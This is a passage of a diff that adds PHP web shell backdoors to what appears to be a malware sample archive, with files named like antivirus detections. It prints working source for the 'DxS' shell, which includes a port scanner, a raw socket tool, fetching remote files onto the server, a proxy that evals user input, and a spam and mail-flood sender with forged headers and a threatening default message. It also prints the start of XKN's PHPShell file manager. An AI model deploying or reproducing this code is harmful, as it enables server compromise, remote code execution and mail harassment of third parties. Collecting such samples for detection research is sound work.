Services',119=>'NNTP',120=>'CFDP',123=>'NTP',124=>'SecureID',129=>'PWDGEN',133=>'statsrv',135=>'loc-srv/epmap',137=>'netbios-ns',138=>'netbios-dgm (UDP)',139=>'NetBIOS',143=>'IMAP',144=>'NewS',150=>'SQL-NET',152=>'BFTP',153=>'SGMP',156=>'SQL Service',161=>'SNMP',175=>'vmnet',177=>'XDMCP',178=>'NextStep Window Server',179=>'BGP',180=>'SLmail admin',199=>'smux',210=>'Z39.50',213=>'IPX',218=>'MPP',220=>'IMAP3',256=>'RAP',257=>'Secure Electronic Transaction',258=>'Yak Winsock Personal Chat',259=>'ESRO',264=>'FW1_topo',311=>'Apple WebAdmin',350=>'MATIP type A',351=>'MATIP type B',363=>'RSVP tunnel',366=>'ODMR (On-Demand Mail Relay)',371=>'Clearcase',387=>'AURP (AppleTalk Update-Based Routing Protocol)',389=>'LDAP',407=>'Timbuktu',427=>'Server Location',434=>'Mobile IP',443=>'ssl',444=>'snpp, Simple Network Paging Protocol',445=>'SMB',458=>'QuickTime TV/Conferencing',468=>'Photuris',475=>'tcpnethaspsrv',500=>'ISAKMP, pluto',511=>'mynet-as',512=>'biff, rexec',513=>'who, rlogin',514=>'syslog, rsh',515=>'lp, lpr, line printer',517=>'talk',520=>'RIP (Routing Information Protocol)',521=>'RIPng',522=>'ULS',531=>'IRC',543=>'KLogin, AppleShare over IP',545=>'QuickTime',548=>'AFP',554=>'Real Time Streaming Protocol',555=>'phAse Zero',563=>'NNTP over SSL',575=>'VEMMI',581=>'Bundle Discovery Protocol',593=>'MS-RPC',608=>'SIFT/UFT',626=>'Apple ASIA',631=>'IPP (Internet Printing Protocol)',635=>'RLZ DBase',636=>'sldap',642=>'EMSD',648=>'RRP (NSI Registry Registrar Protocol)',655=>'tinc',660=>'Apple MacOS Server Admin',666=>'Doom',674=>'ACAP',687=>'AppleShare IP Registry',700=>'buddyphone',705=>'AgentX for SNMP',901=>'swat, realsecure',993=>'s-imap',995=>'s-pop',1024=>'Reserved',1025=>'network blackjack',1062=>'Veracity',1080=>'SOCKS',1085=>'WebObjects',1227=>'DNS2Go',1243=>'SubSeven',1338=>'Millennium Worm',1352=>'Lotus Notes',1381=>'Apple Network License Manager',1417=>'Timbuktu Service 1 Port',1418=>'Timbuktu Service 2 Port',1419=>'Timbuktu Service 3 Port',1420=>'Timbuktu Service 4 Port',1433=>'Microsoft SQL Server',1434=>'Microsoft SQL Monitor',1477=>'ms-sna-server',1478=>'ms-sna-base',1490=>'insitu-conf',1494=>'Citrix ICA Protocol',1498=>'Watcom-SQL',1500=>'VLSI License Manager',1503=>'T.120',1521=>'Oracle SQL',1522=>'Ricardo North America License Manager',1524=>'ingres',1525=>'prospero',1526=>'prospero',1527=>'tlisrv',1529=>'oracle',1547=>'laplink',1604=>'Citrix ICA, MS Terminal Server',1645=>'RADIUS Authentication',1646=>'RADIUS Accounting',1680=>'Carbon Copy',1701=>'L2TP/LSF',1717=>'Convoy',1720=>'H.323/Q.931',1723=>'PPTP control port',1731=>'MSICCP',1755=>'Windows Media .asf',1758=>'TFTP multicast',1761=>'cft-0',1762=>'cft-1',1763=>'cft-2',1764=>'cft-3',1765=>'cft-4',1766=>'cft-5',1767=>'cft-6',1808=>'Oracle-VP2',1812=>'RADIUS server',1813=>'RADIUS accounting',1818=>'ETFTP',1973=>'DLSw DCAP/DRAP',1985=>'HSRP',1999=>'Cisco AUTH',2001=>'glimpse',2049=>'NFS',2064=>'distributed.net',2065=>'DLSw',2066=>'DLSw',2106=>'MZAP',2140=>'DeepThroat',2301=>'Compaq Insight Management Web Agents',2327=>'Netscape Conference',2336=>'Apple UG Control',2427=>'MGCP gateway',2504=>'WLBS',2535=>'MADCAP',2543=>'sip',2592=>'netrek',2727=>'MGCP call agent',2628=>'DICT',2998=>'ISS Real Secure Console Service Port',3000=>'Firstclass',3001=>'Redwood Broker',3031=>'Apple AgentVU',3128=>'squid',3130=>'ICP',3150=>'DeepThroat',3264=>'ccmail',3283=>'Apple NetAssitant',3288=>'COPS',3305=>'ODETTE',3306=>'mySQL',3389=>'RDP Protocol (Terminal Server)',3521=>'netrek',4000=>'icq, command-n-conquer and shell nfm',4321=>'rwhois',4333=>'mSQL',4444=>'KRB524',4827=>'HTCP',5002=>'radio free ethernet',5004=>'RTP',5005=>'RTP',5010=>'Yahoo! Messenger',5050=>'multimedia conference control tool',5060=>'SIP',5150=>'Ascend Tunnel Management Protocol',5190=>'AIM',5500=>'securid',5501=>'securidprop',5423=>'Apple VirtualUser',5555=>'Personal Agent',5631=>'PCAnywhere data',5632=>'PCAnywhere',5678=>'Remote Replication Agent Connection',5800=>'VNC',5801=>'VNC',5900=>'VNC',5901=>'VNC',6000=>'X Windows',6112=>'BattleNet',6502=>'Netscape Conference',6667=>'IRC',6670=>'VocalTec Internet Phone, DeepThroat',6699=>'napster',6776=>'Sub7',6970=>'RTP',7007=>'MSBD, Windows Media encoder',7070=>'RealServer/QuickTime',7777=>'cbt',7778=>'Unreal',7648=>'CU-SeeMe',7649=>'CU-SeeMe',8000=>'iRDMI/Shoutcast Server',8010=>'WinGate 2.1',8080=>'HTTP',8181=>'HTTP',8383=>'IMail WWW',8875=>'napster',8888=>'napster',8889=>'Desktop Data TCP 1',8890=>'Desktop Data TCP 2',8891=>'Desktop Data TCP 3: NESS application',8892=>'Desktop Data TCP 4: FARM product',8893=>'Desktop Data TCP 5: NewsEDGE/Web application',8894=>'Desktop Data TCP 6: COAL application',9000=>'CSlistener',10008=>'cheese worm',11371=>'PGP 5 Keyserver',13223=>'PowWow',13224=>'PowWow',14237=>'Palm',14238=>'Palm',18888=>'LiquidAudio',21157=>'Activision',22555=>'Vocaltec Web Conference',23213=>'PowWow',23214=>'PowWow',23456=>'EvilFTP',26000=>'Quake',27001=>'QuakeWorld',27010=>'Half-Life',27015=>'Half-Life',27960=>'QuakeIII',30029=>'AOL Admin',31337=>'Back Orifice',32777=>'rpc.walld',45000=>'Cisco NetRanger postofficed',32773=>'rpc bserverd',32776=>'rpc.spray',32779=>'rpc.cmsd',38036=>'timestep',40193=>'Novell',41524=>'arcserve discovery',); + + if (isset($_GET['dxparam'])) + { print "\n".'<table><tr><td class=listing colspan=2><h2>#Scan main will scan these '.count($DEF_PORTS).' ports:</td></tr>'; + $INDEXES=array_keys($DEF_PORTS); + for ($i=0;$i<count($INDEXES);$i++) + print "\n".'<tr><td width=40 class=listing style="text-align:right;">'.$INDEXES[$i].'</td><td class=listing>'.$DEF_PORTS[ $INDEXES[$i] ].'</td></tr>'; + print "\n".'</table>'; + die(); + } + + if (isset($_POST['dxportscan'])) + { $OKAY_PORTS = 0; + $TOSCAN=array(); + + if ($_POST['dxportscan']['ports']=='#default') $TOSCAN=array_keys($DEF_PORTS); + else + { $_POST['dxportscan']['ports']=explode(',',$_POST['dxportscan']['ports']); + for ($i=0;$i<count($_POST['dxportscan']['ports']);$i++) + { $_POST['dxportscan']['ports'][$i]=explode('-',$_POST['dxportscan']['ports'][$i]); + if (count($_POST['dxportscan']['ports'][$i])==1) $TOSCAN[]=$_POST['dxportscan']['ports'][$i][0]; + else + $TOSCAN+=range($_POST['dxportscan']['ports'][$i][0], $_POST['dxportscan']['ports'][$i][1]); + $_POST['dxportscan']['ports'][$i]=implode('-', $_POST['dxportscan']['ports'][$i]); + } + $_POST['dxportscan']['ports']=implode(',',$_POST['dxportscan']['ports']); + } + + print "\n".'<table><tr><td colspan=2><font class="highlight_txt">Opened ports:</td></tr>'; + list($usec, $sec) = explode(' ', microtime()); + $start=(float)$usec + (float)$sec; + for ($i=0;$i<count($TOSCAN);$i++) + { $cur_port=&$TOSCAN[$i]; + $fp=@fsockopen($_POST['dxportscan']['host'], $cur_port, $e, $e, (float)$_POST['dxportscan']['timeout']); + if ($fp) + { $OKAY_PORTS++; + $port_name=''; + if (isset($DEF_PORTS[$cur_port])) $port_name=$DEF_PORTS[$cur_port]; + print "\n".'<tr><td width=50 class=listing style="text-align:right;">'.$cur_port.'</td><td class=listing>'.$port_name.'</td><td class=listing>'.getservbyport($cur_port, 'tcp').'</td></tr>'; + } + } + list($usec, $sec) = explode(' ', microtime()); + $end=(float)$usec + (float)$sec; + + print "\n".'</table>'; + print "\n".'<font class="highlight_txt">Scanned '.count($TOSCAN).', '.$OKAY_PORTS.' opened. Time: '.($end-$start).'</font>'; + print "\n".'<br><hr>'."\n"; + } + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table border=0>' + .'<tr>' + .'<td colspan=2>' + .'<input type=text name="dxportscan[host]" value="'.((isset($_POST['dxportscan']['host']))?$_POST['dxportscan']['host'].'"':'127.0.0.1"').' SIZE=30>' + .'<input type=text name="dxportscan[timeout]" value="'.((isset($_POST['dxportscan']['timeout']))?$_POST['dxportscan']['timeout'].'"':'0.1"').' SIZE=10>' + .'</tr><tr>' + .'<td><textarea name="dxportscan[ports]" rows=3 cols=50>'.((isset($_POST['dxportscan']['ports']))?$_POST['dxportscan']['ports']:'21-25,35,80,3306').'</textarea>' + .'</td><td>' + .'<input type=checkbox name="dxportscan[ports]" value="#default"><a '.DxDesign_DrawBubbleBox('', 'To learn out what "main ports" are, click here', 300).' href="'.DxURL('kill','dxparam').'&dxparam=main_legend">#Scan main</a>' + .'<br><input type=submit value="Scan" class="submit" style="width:100pt;">' + .'</tr></table></form>'; + } + +######## +######## Raw s0cket +######## +if ($_GET['dxmode']=='SOCK') + { + $DEFQUERY=DxHTTPMakeHeaders('GET', '/index.php?get=q&get2=d', 'www.microsoft.com', 'DxS Browser', 'http://referer.com/', array('post_val' => 'Yeap'), array('cookiename' => 'val')); + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; print "\n".'<table width=100% cellspacing=0 celpadding=0>'; + print "\n".'<tr><td class=linelisting colspan=2 width=100%><input type=text name="dxsock_host" value="'.( (isset($_POST['dxsock_host'])?$_POST['dxsock_host']:'www.microsoft.com') ).'" style="width:100%;">'; + print "\n".'</td><td class=linelisting><nobr><input type=text name="dxsock_port" value="'.( (isset($_POST['dxsock_port'])?$_POST['dxsock_port']:'80') ).'" SIZE=10>' + .' timeout <input type=text name="dxsock_timeout" value="'.( (isset($_POST['dxsock_timeout'])?$_POST['dxsock_timeout']:'1.0') ).'" SIZE=4></td></tr>'; + print "\n".'<tr><td class=linelisting colspan=3>' + .'<textarea ROWS=15 name="dxsock_request" style="width:100%;">'.( (isset($_POST['dxsock_request'])?$_POST['dxsock_request']:$DEFQUERY) ).'</textarea>' + .'</td></tr>'; + print "\n".'<tr>' + .'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="HTML" '.( (isset($_POST['dxsock_type'])? (($_POST['dxsock_type']=='HTML')?'CHECKED':'') :'CHECKED') ).'>HTML</td>' + .'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="TEXT" '.( (isset($_POST['dxsock_type'])? (($_POST['dxsock_type']=='TEXT')?'CHECKED':'') :'') ).'>TEXT</td>' + .'<td class=linelisting width=100%><div align=right><input type=submit class=submit value="Send" style="width:100pt;height:20pt;"></td>' + .'</tr>'; + print "\n".'</table>'; + + if (!isset($_POST['dxsock_host'], $_POST['dxsock_port'], $_POST['dxsock_timeout'], $_POST['dxsock_request'], $_POST['dxsock_type'])) die(); + + print "\n".'<table width=100% cellspacing=0 celpadding=0>'; + print "\n".'<tr><td class=listing><pre><font class=highlight_txt>'.$_POST['dxsock_request'].'</font></pre></td></tr>'; + print "\n\n\n".'<tr><td class=listing>'; + + $fp=@fsockopen($_POST['dxsock_host'], $_POST['dxsock_port'], $errno, $errstr, (float)$_POST['dxsock_timeout']); + if (!$fp) die(DxError('Sock #'.$errno.' : '.$errstr)); + + if ($_POST['dxsock_type']=='TEXT') print '<plaintext>'; + + if (!empty($_POST['dxsock_request'])) fputs($fp, $_POST['dxsock_request']); + $ret=''; + while (!feof($fp)) $ret.=fgets($fp, 4096 ); + fclose( $fp ); + + if ($_POST['dxsock_type']=='HTML') $headers_over_place=strpos($ret,"\r\n\r\n"); else $headers_over_place=FALSE; + + if ($headers_over_place===FALSE) print $ret; + else print '<pre>'.substr($ret, 0, $headers_over_place).'</pre><br><hr><br>'.substr($ret, $headers_over_place); + + if ($_POST['dxsock_type']=='HTML') print "\n".'</td></tr></table>'; + } + +######## +######## FTP, HTTP file transfers +######## +if ($_GET['dxmode']=='FTP') + { print "\n".'<table align=center width=100%><col span=3 align=right width=33%><tr><td align=center><font class="highlight_txt"><b>HTTP Download</td><td align=center><font class="highlight_txt"><b>FTP Download</td><td align=center><font class="highlight_txt"><b>FTP Upload</td></tr>'; + + print "\n".'<tr><td>'; /* HTTP GET */ + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n\t".'<input type=text name="DxFTP_HTTP" value="http://" style="width:100%;">'; + print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt" style="width:100%;">'; + print "\n\t".'<input type=submit value="GET!" style="width:150pt;" class=submit></form>'; + print "\n".'</td><td>'; /* FTP DOWNL */ + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">'; + print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>'; + print "\n\t".'<input type=text name="DxFTP_FileOF" value="get.txt" style="width:100%;">'; + print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/" style="width:100%;">'; + print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>'; + print "\n\t".'<input type=submit name="DxFTP_DWN" value="Download!" style="width:150pt;" class=submit></form>'; + print "\n".'</td><td>'; /* FTP UPL */ + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">'; + print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>'; + print "\n\t".'<input type=text name="DxFTP_FileOF" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt'.'" style="width:100%;">'; + print "\n\t".'<input type=text name="DxFTP_FileTO" value="put.txt" style="width:100%;">'; + print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>'; + print "\n\t".'<input type=submit name="DxFTP_UPL" value="Upload!" style="width:150pt;" class=submit></form>'; + print "\n".'</td></tr></table>'; + + if (isset($_POST['DxFTP_HTTP'])) { $URLPARSED=parse_url($_POST['DxFTP_HTTP']); $request=DxHTTPMakeHeaders('GET', $URLPARSED['path'].'?'.$URLPARSED['query'], $URLPARSED['host']); + if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) die(DxError('Sock #'.$errno.' : '.$errstr)); + fputs($f, $request); + + $GETFILE=''; + while (!feof($f)) $GETFILE.=fgets($f, 4096 ); + fclose( $f ); + + DxFiles_UploadHere($_POST['DxFTP_FileTO'], '', $GETFILE); + } + + if (isset($_POST['DxFTP_DWN']) OR isset($_POST['DxFTP_UPL'])) + { $DxFTP_SERV=explode(':',$_POST['DxFTP_FTP']); + if(empty($DxFTP_SERV[1])) {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = 21;} else {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = (int)$DxFTP_SERV[1];} + if (!($FTP=ftp_connect($DxFTP_SERV,$DxFTP_PORT,10))) die(DxError('No connection')); + if (!ftp_login($FTP, $_POST['DxFTP_USER'], $_POST['DxFTP_PASS'])) die(DxError('Login failed')); + if (isset($_POST['DxFTP_UPL'])) + if (!ftp_put($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII)) + die(DxError('Failed to upload')); else print 'Upload OK'; + if (isset($_POST['DxFTP_DWN'])) + if (!ftp_get($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII)) + die(DxError('Failed to download')); else print 'Download OK'; + ftp_close($FTP); + } + } + +######## +######## HTTP Proxy +######## +if ($_GET['dxmode']=='PROX') + { + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; print "\n".'<table width=100% cellspacing=0>'; + print "\n".'<tr><td width=100pt class=linelisting>URL</td><td><input type=text name="DxProx_Url" value="'.(isset($_POST['DxProx_Url'])?$_POST['DxProx_Url']:'http://www.microsoft.com:80/index.php?get=q&get2=d').'" style="width:100%;"></td></tr>'; + print "\n".'<tr><td width=100pt colspan=2 class=linelisting><nobr>Browser <input type=text name="DxProx_Brw" value="'.(isset($_POST['DxProx_Brw'])?$_POST['DxProx_Brw']:'DxS Browser').'" style="width:40%;">' + .' Referer <input type=text name="DxProx_Ref" value="'.(isset($_POST['DxProx_Ref'])?$_POST['DxProx_Ref']:'http://www.ref.ru/').'" style="width:40%;"></td></tr>'; + print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><td><input type=text name="DxProx_PST" value="'.(isset($_POST['DxProx_PST'])?$_POST['DxProx_PST']:'array(\'post_val\' => \'Yeap\')').'" style="width:100%;"></td></tr>'; + print "\n".'<tr><td width=100pt class=linelisting><nobr>COOKIES (php eval)</td><td><input type=text name="DxProx_CKI" value="'.(isset($_POST['DxProx_CKI'])?$_POST['DxProx_CKI']:'array(\'cookiename\' => \'val\')').'" style="width:100%;"></td></tr>'; + print "\n".'<tr><td colspan=2><input type=submit value="Go" class=submit style="width:100%;">'; + print "\n".'</td></tr></table></form>'; + + if (!isset($_POST['DxProx_Url'])) die(); + + print str_repeat("\n", 10).'<!-- DxS Proxy Browser -->'."\n\n"; + + if (empty($_POST['DxProx_PST'])) $_POST['DxProx_PST']=array(); + else {if (eval('$_POST[\'DxProx_PST\']='.$_POST['DxProx_PST'].';')===FALSE) $_POST['DxProx_PST']=array();} + if (empty($_POST['DxProx_CKI'])) $_POST['DxProx_CKI']=array(); + else {if (eval('$_POST[\'DxProx_CKI\']='.$_POST['DxProx_CKI'].';')===FALSE) $_POST['DxProx_CKI']=array();} + + $URLPARSED=parse_url($_POST['DxProx_Url']); + $request=DxHTTPMakeHeaders('GET', (empty($URLPARSED['path'])?'/':$URLPARSED['path']).(!empty($URLPARSED['query'])?'?'.$URLPARSED['query']:''), $URLPARSED['host'], $_POST['DxProx_Brw'], $_POST['DxProx_Ref'], $_POST['DxProx_PST'], $_POST['DxProx_CKI']); + if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) + die(DxError('Sock #'.$errno.' : '.$errstr)); + fputs($f, $request); + + $RET=''; + while (!feof($f)) $RET.=fgets($f, 4096 ); + fclose( $f ); + + print "\n".'<table width=100% border=0><tr><td>'; + $headers_over_place=strpos($RET,"\r\n\r\n"); + if ($headers_over_place===FALSE) print $RET; + else + print '<pre><font class=highlight_txt>'.substr($RET, 0, $headers_over_place).'</font></pre><br><hr><br>'.substr($RET, $headers_over_place); + print str_repeat("\n", 10).'</td></tr></table>'; + } + +######## +######## MAIL +######## +if ($_GET['dxmode']=='MAIL') + { if (!isset($_GET['dxparam'])) + { + print ''; print "\n".'<form action="'.DxURL('kill', '').'" method=GET style="display:inline;">'; + DxGETinForm('leave', ''); + print "\n".'<input type=submit name="dxparam" value="SPAM" style="position: absolute; width: 30%; left: 10%;">' + .'<font class=highlight_txt style="position:absolute;left:46.5%;">: MAIL mode :</font>' + .'<input type=submit name="dxparam" value="FLOOD" style="position: absolute; width: 30%; right: 10%;">'; + print "\n".'</form>'; + die();} + + if (ini_get('sendmail_path')=='') DxWarning('php.ini "sendmail_path" is empty! ('.var_export(ini_get('sendmail_path'), true).')'); + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table width=100% cellspacing=0 width=90% align=center><col width=100pt>'; + if ($_GET['dxparam']=='FLOOD') + { print "\n".'<tr><td class=linelisting><b>TO: </td><td><input type=text name="DxMailer_TO" style="width:100%;" value="'.( (empty($_POST['DxMailer_TO']))?'tristam@mail.ru':$_POST['DxMailer_TO'] ).'"></td></tr>'; + print "\n".'<tr><td class=linelisting><b>NUM FLOOD: </td><td><input type=text name="DxMailer_NUM" value="'.( (empty($_POST['DxMailer_NUM']))?'1000':$_POST['DxMailer_NUM'] ).'" SIZE=10></td></tr>'; + } + else print "\n".'<tr><td class=linelisting><b>TO: </td><td><textarea name="DxMailer_TO" rows=10 style="width:100%;">'.( (empty($_POST['DxMailer_TO']))?'tristam@mail.ru'."\n".'billy@microsoft.com':$_POST['DxMailer_TO'] ).'</textarea></td></tr>'; + print "\n".'<tr><td class=linelisting><b>FROM: </td><td><input type=text name="DxMailer_FROM" value="'.( (empty($_POST['DxMailer_FROM']))?'DxS <admin@'.$_SERVER['HTTP_HOST']:$_POST['DxMailer_FROM'] ).'>" style="width:100%;"></td></tr>'; + print "\n".'<tr><td class=linelisting><b>SUBJ: </td><td><input type=text name="DxMailer_SUBJ" style="width:100%;" value="'.( (empty($_POST['DxMailer_SUBJ']))?'Look here, man...':$_POST['DxMailer_SUBJ'] ).'"></td></tr>'; + print "\n".'<tr><td class=linelisting><b>MSG: </td><td><textarea name="DxMailer_MSG" rows=5 style="width:100%;">'.( (empty($_POST['DxMailer_MSG']))?'<html><body><b>Wanna be butchered?':$_POST['DxMailer_MSG'] ).'</textarea></td></tr>'; + print "\n".'<tr><td class=linelisting colspan=2><div align=center><input type=submit Value="'.$_GET['dxparam'].'" class=submit style="width:70%;"></tr>'; + print "\n".'</td></table></form>'; + + if (!isset($_POST['DxMailer_TO'])) die(); + + $HEADERS=''; + $HEADERS.= 'MIME-Version: 1.0'."\r\n"; + $HEADERS.= 'Content-type: text/html;'."\r\n"; + $HEADERS.='To: %%TO%%'."\r\n"; + $HEADERS.='From: '.$_POST['DxMailer_FROM']."\r\n"; + $HEADERS.='X-Originating-IP: [%%IP%%]'."\r\n"; + $HEADERS.='X-Mailer: DxS v'.$GLOB['SHELL']['Ver'].' Mailer'."\r\n"; + $HEADERS.='Message-Id: <%%ID%%>'; + + if ($_GET['dxparam']=='FLOOD') + { $NUM=$_POST['DxMailer_NUM']; + $MAILS=array($_POST['DxMailer_TO']); + } + else + { $MAILS=explode("\n",str_replace("\r", '', $_POST['DxMailer_TO'])); + $NUM=1; + } + + function DxMail($t, $s, $m, $h) /* debugger */ + {print "\n\n\n<br><br><br>".$t."\n<br>".$s."\n<br>".$m."\n<br>".$h;} + + $RESULTS[]=array(); + + for ($n=0;$n<$NUM;$n++) + for ($m=0;$m<count($MAILS);$m++) $RESULTS[]=(int) + mail($MAILS[$m], $_POST['DxMailer_SUBJ'], $_POST['DxMailer_MSG'], + str_replace(array('%%TO%%','%%IP%%', '%%ID%%'), + array('<'.$MAILS[$m].'>' , long2ip(mt_rand(0,pow(2,31))) , md5($n.$m.DxRandomChars(3).time())), + $HEADERS) + ); + + print "\n\n".'<br><br>'.array_sum($RESULTS).' mails sent ('.( (100*array_sum($RESULTS))/($NUM*(count($MAILS))) ).'% okay)'; + + } + +if ($DXGLOBALSHIT) print "\n\n\n".'<!--/SHIT KILLER--></TD></TR></TABLE>'; +die(); +?> + diff --git a/PHP/Backdoor.PHP.PhpShell.k b/PHP/Backdoor.PHP.PhpShell.k new file mode 100644 index 00000000..abaf866d --- /dev/null +++ b/PHP/Backdoor.PHP.PhpShell.k @@ -0,0 +1,1011 @@ +<?php + +/* +***************************************************************************************** +* PHPSHELL.PHP BY XKN www.GrupoProxysX.org Jan 4th 2008 * +***************************************************************************************** +* * +* Welcome to XKN's PHPShell script... * +* This script will allow you to browse webservers etc... * +* Just copy the file to your directory and open it in your Internet Browser. * +* * +* The webserver should support PHP... * +* * +* You can modify the script if you want, but please send me a copy to: * +* * +***************************************************************************************** + +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! +!! PLEASE NOTE: You should use this script at own risk, if you misuse the script !! +!! it could do damage to the files or even the server... !! +!! You are responsible for your own actions. !! +!! The admin of your webserver should always know you are using this !! +!! script and approve of its use. !! +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! +*/ + + +/*Setting some envirionment variables...*/ + +/* I added this to ensure the script will run correctly... + Please enter the Script's filename in this variable. */ +$SFileName=$PHP_SELF; + +/* uncomment the two following variables if you want to use http + authentication. This will password protect your PHPShell */ +//$http_auth_user = "phpshell"; /* HTTP Authorisation username, uncomment if you want to use this */ +//$http_auth_pass = "phpshell"; /* HTTP Authorisation password, uncomment if you want to use this */ + +error_reporting(0); +$PHPVer=phpversion(); +$isGoodver=(intval($PHPVer[0])>=4); +$scriptTitle = "PHPShell"; +$scriptident = "$scriptTitle by XKN"; + +$urlAdd = ""; +$formAdd = ""; + +function walkArray($array){ + while (list($key, $data) = each($array)) + if (is_array($data)) { walkArray($data); } + else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";} +} + +if (isset($_PUT)) walkArray($_PUT); +if (isset($_GET)) walkArray($_GET); +if (isset($_POST)) walkArray($_POST); + + +$pos = strpos($urlAdd, "s=r"); +if (strval($pos) != "") { +$urlAdd= substr($urlAdd, 0, $pos); +} + +$urlAdd .= "&s=r&"; + +if (empty($Pmax)) + $Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */ +if (empty($Pidx)) + $Pidx = 0; + +$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); +$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + +$scriptdate = "May 11th 2007"; +$scriptver = "Version 2.6.7dev"; +$LOCAL_IMAGE_DIR = "img"; +$REMOTE_IMAGE_URL = "img"; +$img = array( + "Edit" => "edit.gif", + "Download" => "download.gif", + "Upload" => "upload.gif", + "Delete" => "delete.gif", + "View" => "view.gif", + "Rename" => "rename.gif", + "Move" => "move.gif", + "Copy" => "copy.gif", + "Execute" => "exec.gif" + ); + +while (list($id, $im)=each($img)) + if (file_exists("$LOCAL_IMAGE_DIR/$im")) + $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">"; + else + $img[$id] = "[$id]"; + + + + +/* HTTP AUTHENTICATION */ + + if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) { + setcookie("noauth",""); + Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\""); + Header( "HTTP/1.0 401 Unauthorized"); + echo "Your username or password is incorrect"; + exit ; + + } + +function buildUrl($display, $url) { + global $urlAdd; + $url = $SFileName . "?$urlAdd$url"; + return "<a href=\"$url\">$display</a>"; +} + +function sp($mp) { + for ( $i = 0; $i < $mp; $i++ ) + $ret .= "&nbsp;"; + return $ret; +} + +function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr); } + +function Mydeldir($Fdir) { + if (is_dir($Fdir)) { + $Fh=@opendir($Fdir); + while ($Fbuf = readdir($Fh)) + if (($Fbuf != ".") && ($Fbuf != "..")) + Mydeldir("$Fdir/$Fbuf"); + @closedir($Fh); + return rmdir($Fdir); + } else { + return unlink($Fdir); + } +} + + +function arrval ($array) { +list($key, $data) = $array; +return $data; +} + +function formatsize($insize) { + $size = $insize; + $add = "B"; + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "KB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "MB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "GB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "TB"; + } + return "$size $add"; +} + +if ($cmd != "downl") { + ?> + +<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> --> +<HTML> + <HEAD> + <STYLE> + <!-- + A{ text-decoration:none; color:navy; font-size: 12px } + body { font-size: 12px; + font-family: arial, helvetica; + scrollbar-width: 5; + scrollbar-height: 5; + scrollbar-face-color: white; + scrollbar-shadow-color: silver; + scrollbar-highlight-color: white; + scrollbar-3dlight-color:silver; + scrollbar-darkshadow-color: silver; + scrollbar-track-color: white; + scrollbar-arrow-color: black; + } + Table { font-size: 12px; } + TR{ font-size: 12px; } + TD{ font-size: 12px; + font-family: arial, helvetical; + BORDER-LEFT: black 0px solid; + BORDER-RIGHT: black 0px solid; + BORDER-TOP: black 0px solid; + BORDER-BOTTOM: black 0px solid; + COLOR: black; + } + .border{ BORDER-LEFT: black 1px solid; + BORDER-RIGHT: black 1px solid; + BORDER-TOP: black 1px solid; + BORDER-BOTTOM: black 1px solid; + } + .none { BORDER-LEFT: black 0px solid; + 